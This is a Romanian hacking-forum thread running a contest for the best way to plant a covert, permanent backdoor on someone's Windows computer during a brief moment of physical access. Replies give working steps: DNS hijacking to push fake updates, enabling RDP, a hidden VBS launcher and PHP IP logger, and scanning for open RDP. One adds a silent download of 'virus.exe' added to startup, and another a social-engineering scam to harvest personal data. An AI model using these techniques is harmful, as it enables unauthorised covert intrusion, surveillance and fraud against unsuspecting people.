Jump to content
em

Backdoor in 45 seconds - Challenge

Recommended Posts

Posted

Cel mai discret, iar timp 3-5 sec:

Alterezi dns cu serv tau de dns, apoi ii poti sugera sa descarca orice, ba chiar te poti folosi de windows update / alte updateuri ale prog ce le foloseste (le urmaresti prin serv de dns).

  • Upvote 2
Posted
Îmi accesez blogul ?i-mi las comentariu (sau ping din cmd, ca s? nu las prea multe urme, de?i... accesezi o adres?. ce faci acolo? p?i m? uit pe blog/site la mine). Been there. :))

Pai nu ai internet in acel moment.

Posted (edited)

1.Allow rdp

2.Pentru a lua ip-ul,presupunand ca o sa aiba acces la internet eventual,creezi un vbs gen:

Set WshShell = WScript.CreateObject("WScript.Shell")

Return = WshShell.Run("iexplore.exe adresata.com/a.php", 0)

Dupa care schimbi path-ul unui shortcut catre vbs-ul tau.Eventual setezi "hide my computer from desktop" si creezi un shortcut cu icoana my computer si path-ul vbs-ului.

"a.php" poate fi un fisier de genul

<?php

file_put_contents('a.txt',file_get_contents('a.txt') . $_SERVER['REMOTE_ADDR'] . "\r\n");

Iar in cazul ca nu esti deja pregatit cu un server cu fisierul prezent,poti schimba adresa catre un monitor de genul: Web Traffic Statistics - Stats - gainiderasa.in - Ultimele 25 de afisari , dupa care poti identifica ip-ul in functie de ora,data,browser,os ,iar avand in vedere ca ultima parte a ip-ului este cenzurata,dai un nmap (.0/24) dupa ip-uri cu portul alocat rdp-ului,deschis.

Edited by qbert
Posted
Sa presupunem ca esti la cineva acasa si lipseste un timp foarte scurt de la calculator (30secunde - 1minut).

Scopul tau. Sa iti asiguri un backdoor permanent la acel calculator.

Piedici:

* Calculatorul nu are net in acel moment.

* Nu ai cu tine niciun stick USB/CD whatevar.

* Ownerul calculatorului nu trebuie sa se prinda de nimic.

Va castiga cel cu solutia cea mai ingenioasa care ofera controlul cel mai mare la resursele sistemului. Luati in calcul si un posibil antivirus.

Restrictii:

* Windows

Premiu:

* O carte de programare. (cat 2 biblii)

Foarte multi sugereaza ca ar fi indicat sa iti faci un user in calculator, pacat ca variaza de ce sistem de operare are si setarile lui. (In windows XP, dupa restart, iti apare userul tau si al lui si este valabil in mai multe OS-uri (setarile default), astfel victima observa - automat intra in discutie piedica 3)

A doua sugestie pe care foarte multi o recomanda din nou, ar fi sa setezi in browserul victimei un link direct catre un virus (rat probabil sau indiferent de ce ar fi, trebuie sa fie 100% FUD, sau sa fie un program personal, care iti permite backdoor-ul fara a activa AV-ul).

Conteaza daca persoana respectiva are AV, cum se numeste, ce sistem de operare, ce cunostinte generale despre computere are,etc

+ trebuie sa iei in calcul si micile suprize,obstacole,stres, blocarea calculatorului, nu ai de unde stii ...

Posted
Cel mai discret, iar timp 3-5 sec:

Alterezi dns cu serv tau de dns, apoi ii poti sugera sa descarca orice, ba chiar te poti folosi de windows update / alte updateuri ale prog ce le foloseste (le urmaresti prin serv de dns).

Mi se pare cea mai buna metoda si dureaza foarte putin.

Posted
vorbe?te prostii. singurele comenzi care pot fi executate asupra juc?torului sunt doar comenzile care le poate da ?i juc?torul singur ( quit, kill, connect server.plm, sensitivity 8.0, etc), nu ai control în afara cs-ului. cel cu motd ar fi fost singura op?iune

Poti deschide CD-Rom.

  • Active Members
Posted

Cea mai buna metoda e asta:

Dechizi browserul setezi la download sa nu ceara calea de download si setezi tu una pe care sa o stii ex(C:\Downloads).

2.Setezi ca pagina de home un server de al tau gen (server.com/infect.php).

3.Setezi la startup calea C:\Downloads\virus.exe.

Acasa creezi scriptul php infect.php si virus.exe

infect.php

<?php

mysql_connect('localhost','root','pass');

mysql_select_db('logs');

mysql_query('INSERT INTO `ip` (`ip`) VALUES(".$_SERVER['REMOTE_ADDR'].")');

mysql_close();

echo '<script>document.location="server.com/virus.exe";</script>';

?>

Posted (edited)

ii fac si ii pun la startup o pagina in care sa il anunte ca beneficiaza de net moca 7 luni plus echipament (sau lata oferta de nerefuzat)daca ma suna (sau il suna pe respectivul care il pun eu) sa facem o foaie de primire echipamente fara contract bineinteles si ca trebuie sa imi dea toate datele lui personale plus sa vad daca sistemul lui suporta echipamentul si atunci vin "dotat", metoda veche old school :)

nu se merita sa apelez la metode instabile mai bine asa ... cine stie cand o sa aiba net eu ii fac proba cu stick rds cand vin si i-am luat ce ma intereseaza il mai las si 1 saptamana "pana vin echipamnetele", cand o sa isi puna net o sa se trezeasca cu 10 aplicatii backdoor :D

daca are deja net dar nu e activat ii propun sa testam netul de pe stick sa facem un sondaj si revin cu stick-ul ulterior.

Nu ai cum sa setezi un sender sau un finder de smtp-uri privind IP-ul dinamic intr-un minut ca sa iti raporteze pe email ip-ul dinamic al victimei, doar sa setezi outlook-ul ca host pe pc-ul omului si asta depinde de versiunea windows-ului.Iar un bot-net sau ceva de genul cu raport pe ftp sau :80 nu poate fi scris asa de repede cu toate actiunile preluate de programele ce ruleaza (am uitat cum le zice preluai din yahoo mess pe baza label-urilor, field-urilor) Bafta !

Edited by damageboy
Posted

Pentru ca raspunsurile va sunt asemanatoare, am folosit random.org sa aleg castigatorul.

N #13. nedo.

3 zile sa trimiti un PM cu adresa. Cartea "Grafica Interactiva in java" (aleasa tot cu random.org).

Raspunsurile raman deschide dar fara premiu.

Posted

Thanks, =)) Cred ca ar trebui sa joc la loto, ca vad ca am devenit norocos la castiguri din astea. Sunt destul de sigur ca o sa imi prinda bine cartea. Cu o cazia asta ma apuc si de java :))

Multumim em pentru chalange si premiu.

Posted
Rat in motd si 1 plugin pe server care sa-l execute. Hf

Nu prea gasesc documentat ce zici tu aici? Ai putea sa faci o demonstratie?

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...